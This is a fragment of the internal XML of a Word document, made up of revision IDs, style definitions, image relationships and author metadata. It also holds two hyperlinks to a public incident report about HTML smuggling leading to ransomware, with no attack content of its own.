    <w:rsid w:val="1005F8A7"/>
    <w:rsid w:val="10D3B101"/>
    <w:rsid w:val="110EB9C0"/>
    <w:rsid w:val="111E76FC"/>
    <w:rsid w:val="1247A08F"/>
    <w:rsid w:val="126A1AEA"/>
    <w:rsid w:val="12897420"/>
    <w:rsid w:val="12E49DDF"/>
    <w:rsid w:val="133DD31F"/>
    <w:rsid w:val="133DD31F"/>
    <w:rsid w:val="1376A36D"/>
    <w:rsid w:val="13F6117C"/>
    <w:rsid w:val="14ABE7FF"/>
    <w:rsid w:val="14ABE7FF"/>
    <w:rsid w:val="14F6364B"/>
    <w:rsid w:val="14FC8827"/>
    <w:rsid w:val="1527AECA"/>
    <w:rsid w:val="1527AECA"/>
    <w:rsid w:val="15A632B5"/>
    <w:rsid w:val="15A632B5"/>
    <w:rsid w:val="15D28648"/>
    <w:rsid w:val="16889ABA"/>
    <w:rsid w:val="16943407"/>
    <w:rsid w:val="1727E5AC"/>
    <w:rsid w:val="172DE626"/>
    <w:rsid w:val="17325434"/>
    <w:rsid w:val="183ED2ED"/>
    <w:rsid w:val="1856252A"/>
    <w:rsid w:val="192F7D36"/>
    <w:rsid w:val="19698817"/>
    <w:rsid w:val="19A6DEDF"/>
    <w:rsid w:val="19C8D14E"/>
    <w:rsid w:val="1B0A003F"/>
    <w:rsid w:val="1B13A964"/>
    <w:rsid w:val="1BA388BC"/>
    <w:rsid w:val="1BD2FD34"/>
    <w:rsid w:val="1D55C62C"/>
    <w:rsid w:val="1D9DC5B9"/>
    <w:rsid w:val="1E139E62"/>
    <w:rsid w:val="1E75D740"/>
    <w:rsid w:val="1EA12B8C"/>
    <w:rsid w:val="1EF3A6A5"/>
    <w:rsid w:val="1F4DB2A6"/>
    <w:rsid w:val="1FDF510C"/>
    <w:rsid w:val="2024A73D"/>
    <w:rsid w:val="20300B2E"/>
    <w:rsid w:val="20D2EED5"/>
    <w:rsid w:val="21479555"/>
    <w:rsid w:val="21479555"/>
    <w:rsid w:val="21678413"/>
    <w:rsid w:val="2196A5F4"/>
    <w:rsid w:val="221A1406"/>
    <w:rsid w:val="224C0C10"/>
    <w:rsid w:val="2263C75F"/>
    <w:rsid w:val="227F096C"/>
    <w:rsid w:val="22AD7CF6"/>
    <w:rsid w:val="22AD7CF6"/>
    <w:rsid w:val="22B21DD9"/>
    <w:rsid w:val="2382A9C2"/>
    <w:rsid w:val="23A5E32B"/>
    <w:rsid w:val="2473B653"/>
    <w:rsid w:val="24A135FA"/>
    <w:rsid w:val="24FEBE2C"/>
    <w:rsid w:val="25402C1E"/>
    <w:rsid w:val="256119B7"/>
    <w:rsid w:val="26A99D3F"/>
    <w:rsid w:val="275DA0FE"/>
    <w:rsid w:val="276AFE55"/>
    <w:rsid w:val="27BA27C0"/>
    <w:rsid w:val="27DD7C5A"/>
    <w:rsid w:val="27DD7C5A"/>
    <w:rsid w:val="28D40C91"/>
    <w:rsid w:val="28D4FC3C"/>
    <w:rsid w:val="2926081A"/>
    <w:rsid w:val="29A55558"/>
    <w:rsid w:val="2A6E180F"/>
    <w:rsid w:val="2BD7A917"/>
    <w:rsid w:val="2BE032A6"/>
    <w:rsid w:val="2C2748BA"/>
    <w:rsid w:val="2C4B95A8"/>
    <w:rsid w:val="2C8C73A9"/>
    <w:rsid w:val="2C8C73A9"/>
    <w:rsid w:val="2D03BD63"/>
    <w:rsid w:val="2D03BD63"/>
    <w:rsid w:val="2D34EF58"/>
    <w:rsid w:val="2D868BEE"/>
    <w:rsid w:val="2DA68CCD"/>
    <w:rsid w:val="2DA68CCD"/>
    <w:rsid w:val="2E9E56EE"/>
    <w:rsid w:val="2E9E56EE"/>
    <w:rsid w:val="2F60788A"/>
    <w:rsid w:val="2FB5D845"/>
    <w:rsid w:val="2FEFCAD7"/>
    <w:rsid w:val="3031316B"/>
    <w:rsid w:val="3031A4B9"/>
    <w:rsid w:val="31376F99"/>
    <w:rsid w:val="318A462A"/>
    <w:rsid w:val="3222D2CC"/>
    <w:rsid w:val="326FF3A9"/>
    <w:rsid w:val="3290A523"/>
    <w:rsid w:val="330AFC00"/>
    <w:rsid w:val="334EC9EE"/>
    <w:rsid w:val="33829FA7"/>
    <w:rsid w:val="33A4F266"/>
    <w:rsid w:val="33EF5C2F"/>
    <w:rsid w:val="351B1173"/>
    <w:rsid w:val="35A22698"/>
    <w:rsid w:val="3603C5B3"/>
    <w:rsid w:val="366D4336"/>
    <w:rsid w:val="368E429E"/>
    <w:rsid w:val="371A2B74"/>
    <w:rsid w:val="373AB63E"/>
    <w:rsid w:val="38B54470"/>
    <w:rsid w:val="398D36E0"/>
    <w:rsid w:val="398FA62C"/>
    <w:rsid w:val="39DDD222"/>
    <w:rsid w:val="3A06ED8B"/>
    <w:rsid w:val="3A27E0E5"/>
    <w:rsid w:val="3A40D4C7"/>
    <w:rsid w:val="3B169497"/>
    <w:rsid w:val="3B2607FC"/>
    <w:rsid w:val="3BDB10DD"/>
    <w:rsid w:val="3C80F9AB"/>
    <w:rsid w:val="3D6C4F03"/>
    <w:rsid w:val="3D98A902"/>
    <w:rsid w:val="3F197A35"/>
    <w:rsid w:val="3F3A9AE9"/>
    <w:rsid w:val="3F5252C4"/>
    <w:rsid w:val="3FA1C10C"/>
    <w:rsid w:val="3FBCAA73"/>
    <w:rsid w:val="3FF7A795"/>
    <w:rsid w:val="406D9D45"/>
    <w:rsid w:val="409206D7"/>
    <w:rsid w:val="40C1A158"/>
    <w:rsid w:val="4230076E"/>
    <w:rsid w:val="42EDB272"/>
    <w:rsid w:val="42F2C230"/>
    <w:rsid w:val="436ECDCC"/>
    <w:rsid w:val="43FC2158"/>
    <w:rsid w:val="440EBF7F"/>
    <w:rsid w:val="440EBF7F"/>
    <w:rsid w:val="45A1FFCC"/>
    <w:rsid w:val="4605602E"/>
    <w:rsid w:val="4605602E"/>
    <w:rsid w:val="46F5F8F6"/>
    <w:rsid w:val="46FCD205"/>
    <w:rsid w:val="470E894C"/>
    <w:rsid w:val="479146B8"/>
    <w:rsid w:val="47971749"/>
    <w:rsid w:val="47CE0C0B"/>
    <w:rsid w:val="47D8F25A"/>
    <w:rsid w:val="47D9C41C"/>
    <w:rsid w:val="47F4A895"/>
    <w:rsid w:val="4884EE16"/>
    <w:rsid w:val="496DFA63"/>
    <w:rsid w:val="496DFA63"/>
    <w:rsid w:val="4A0B7B91"/>
    <w:rsid w:val="4A824FF5"/>
    <w:rsid w:val="4AE7CB1B"/>
    <w:rsid w:val="4AF86406"/>
    <w:rsid w:val="4AFCB400"/>
    <w:rsid w:val="4B11D229"/>
    <w:rsid w:val="4CC9A778"/>
    <w:rsid w:val="4D2B764B"/>
    <w:rsid w:val="4D74292A"/>
    <w:rsid w:val="4DD3C4CF"/>
    <w:rsid w:val="4E307840"/>
    <w:rsid w:val="4E6D2170"/>
    <w:rsid w:val="4F78429A"/>
    <w:rsid w:val="4F87AD39"/>
    <w:rsid w:val="4FA5F579"/>
    <w:rsid w:val="4FA5F579"/>
    <w:rsid w:val="4FD32BC7"/>
    <w:rsid w:val="4FD32BC7"/>
    <w:rsid w:val="50959021"/>
    <w:rsid w:val="509EB158"/>
    <w:rsid w:val="50DE6C6E"/>
    <w:rsid w:val="515FB740"/>
    <w:rsid w:val="5199C2B6"/>
    <w:rsid w:val="51AB7FC1"/>
    <w:rsid w:val="51BA2BAB"/>
    <w:rsid w:val="525D1317"/>
    <w:rsid w:val="52FA8CE1"/>
    <w:rsid w:val="53E25A94"/>
    <w:rsid w:val="53FF70AD"/>
    <w:rsid w:val="54541874"/>
    <w:rsid w:val="545C6B9E"/>
    <w:rsid w:val="54D0BCB9"/>
    <w:rsid w:val="55B123F7"/>
    <w:rsid w:val="55DAB150"/>
    <w:rsid w:val="5610FA17"/>
    <w:rsid w:val="5659B7F1"/>
    <w:rsid w:val="56A711CF"/>
    <w:rsid w:val="58B53A36"/>
    <w:rsid w:val="58CFA497"/>
    <w:rsid w:val="58F1BA7C"/>
    <w:rsid w:val="59788089"/>
    <w:rsid w:val="599B8698"/>
    <w:rsid w:val="59EDF4A4"/>
    <w:rsid w:val="5A6A5DC8"/>
    <w:rsid w:val="5A901B58"/>
    <w:rsid w:val="5AAC781A"/>
    <w:rsid w:val="5B1BC4DA"/>
    <w:rsid w:val="5B1D6ECB"/>
    <w:rsid w:val="5BB692FF"/>
    <w:rsid w:val="5C3FF9F2"/>
    <w:rsid w:val="5CA6DF4F"/>
    <w:rsid w:val="5D391059"/>
    <w:rsid w:val="5E409489"/>
    <w:rsid w:val="5E8EF489"/>
    <w:rsid w:val="5EC03FD1"/>
    <w:rsid w:val="5F0E64C7"/>
    <w:rsid w:val="5F72A78B"/>
    <w:rsid w:val="6055B114"/>
    <w:rsid w:val="60A9D266"/>
    <w:rsid w:val="60F85D97"/>
    <w:rsid w:val="615CE0C5"/>
    <w:rsid w:val="61A60EDC"/>
    <w:rsid w:val="61BC9177"/>
    <w:rsid w:val="61DC8CAF"/>
    <w:rsid w:val="6227C750"/>
    <w:rsid w:val="629E0F91"/>
    <w:rsid w:val="62A20D27"/>
    <w:rsid w:val="62C873DC"/>
    <w:rsid w:val="62E9A338"/>
    <w:rsid w:val="62FA3A22"/>
    <w:rsid w:val="637D3E1D"/>
    <w:rsid w:val="641574E5"/>
    <w:rsid w:val="64492EDE"/>
    <w:rsid w:val="6545B634"/>
    <w:rsid w:val="6574E5D2"/>
    <w:rsid w:val="658A9A63"/>
    <w:rsid w:val="65FA8B26"/>
    <w:rsid w:val="65FA8B26"/>
    <w:rsid w:val="66AEC0B4"/>
    <w:rsid w:val="66B491B4"/>
    <w:rsid w:val="66B7B120"/>
    <w:rsid w:val="66B7B120"/>
    <w:rsid w:val="67676119"/>
    <w:rsid w:val="67714C61"/>
    <w:rsid w:val="6778D307"/>
    <w:rsid w:val="678A4BDB"/>
    <w:rsid w:val="678D13E9"/>
    <w:rsid w:val="678D13E9"/>
    <w:rsid w:val="67DBAC93"/>
    <w:rsid w:val="68171340"/>
    <w:rsid w:val="687344E7"/>
    <w:rsid w:val="687344E7"/>
    <w:rsid w:val="68A57E52"/>
    <w:rsid w:val="68C66C65"/>
    <w:rsid w:val="6962E2F0"/>
    <w:rsid w:val="699CCBDA"/>
    <w:rsid w:val="69C4E43F"/>
    <w:rsid w:val="6A05B9DA"/>
    <w:rsid w:val="6A08EC22"/>
    <w:rsid w:val="6A08EC22"/>
    <w:rsid w:val="6A09F33E"/>
    <w:rsid w:val="6A4EF199"/>
    <w:rsid w:val="6A636C47"/>
    <w:rsid w:val="6B5ECB31"/>
    <w:rsid w:val="6D3F0720"/>
    <w:rsid w:val="6DC8AF07"/>
    <w:rsid w:val="6DD185F5"/>
    <w:rsid w:val="6DF4FBBF"/>
    <w:rsid w:val="6E140FE6"/>
    <w:rsid w:val="6E582925"/>
    <w:rsid w:val="6E7A1916"/>
    <w:rsid w:val="6E836F9A"/>
    <w:rsid w:val="6F2BA99D"/>
    <w:rsid w:val="6F8B460D"/>
    <w:rsid w:val="703D715C"/>
    <w:rsid w:val="70AF9967"/>
    <w:rsid w:val="70BC87B1"/>
    <w:rsid w:val="7150DAF7"/>
    <w:rsid w:val="7206B426"/>
    <w:rsid w:val="73E4CD08"/>
    <w:rsid w:val="7496082C"/>
    <w:rsid w:val="7549F31D"/>
    <w:rsid w:val="75598684"/>
    <w:rsid w:val="75B29D14"/>
    <w:rsid w:val="75C45754"/>
    <w:rsid w:val="764E318D"/>
    <w:rsid w:val="76D12E5D"/>
    <w:rsid w:val="7796BCBA"/>
    <w:rsid w:val="786994D6"/>
    <w:rsid w:val="78FD9A3F"/>
    <w:rsid w:val="791181F8"/>
    <w:rsid w:val="7953BD64"/>
    <w:rsid w:val="7A4349B0"/>
    <w:rsid w:val="7A4349B0"/>
    <w:rsid w:val="7B0CF4A6"/>
    <w:rsid w:val="7B1C219A"/>
    <w:rsid w:val="7C270A67"/>
    <w:rsid w:val="7C56647C"/>
    <w:rsid w:val="7CB8A7AC"/>
    <w:rsid w:val="7D70DF0C"/>
    <w:rsid w:val="7E11CDB5"/>
    <w:rsid w:val="7F0882D2"/>
    <w:rsid w:val="7F67F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C2B6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CBC1A606-88FA-4137-897E-4DDA54165F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1289742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12897420"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:uiPriority w:val="9"/>
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="1289742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12897420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12897420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thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/" TargetMode="External" Id="Re30fb59a64ef49e9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="R4ef4efe9efa549f2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="Ra66bf4cf95ed4c58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/" TargetMode="External" Id="Raf208fe1d2d741ab" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R27571624cbdc430c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R8e628aa2f4564de6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R887b6f216a9a4c62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="R1460e0d148ea4b08" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="R99f603adf5884edc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="Rb8219dde50244210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="Rd1f8e5e5673c4ccb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="Rcbcdef18f5214e1e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="Rc8ba37ea69dd4451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="R96304ca0056840eb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="R15733dde142e433f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="R734ef60539cb4f05" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="R934437e6a9cc42f5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="Re8cf868cb8034d45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="R5dd6de439a244d7c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="R914bc2fd352445f6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="R4391a25272854184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image14.png" Id="Rc2c26261ba294b31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="R60d5c14ec4fd4383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="Rd09338e8fdd642bf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="R342b423eea2343c9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="R3284dcaf72ba4949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="R8f8943b71f03470d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R9ced24bc54184c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2024-11-28T14:26:08.1951879Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-29T02:20:29.8254577Z</dcterms:modified>
  <dc:creator>emrecan atlıhan</dc:creator>
  <lastModifiedBy>emrecan atlıhan</lastModifiedBy>
</coreProperties>
</file>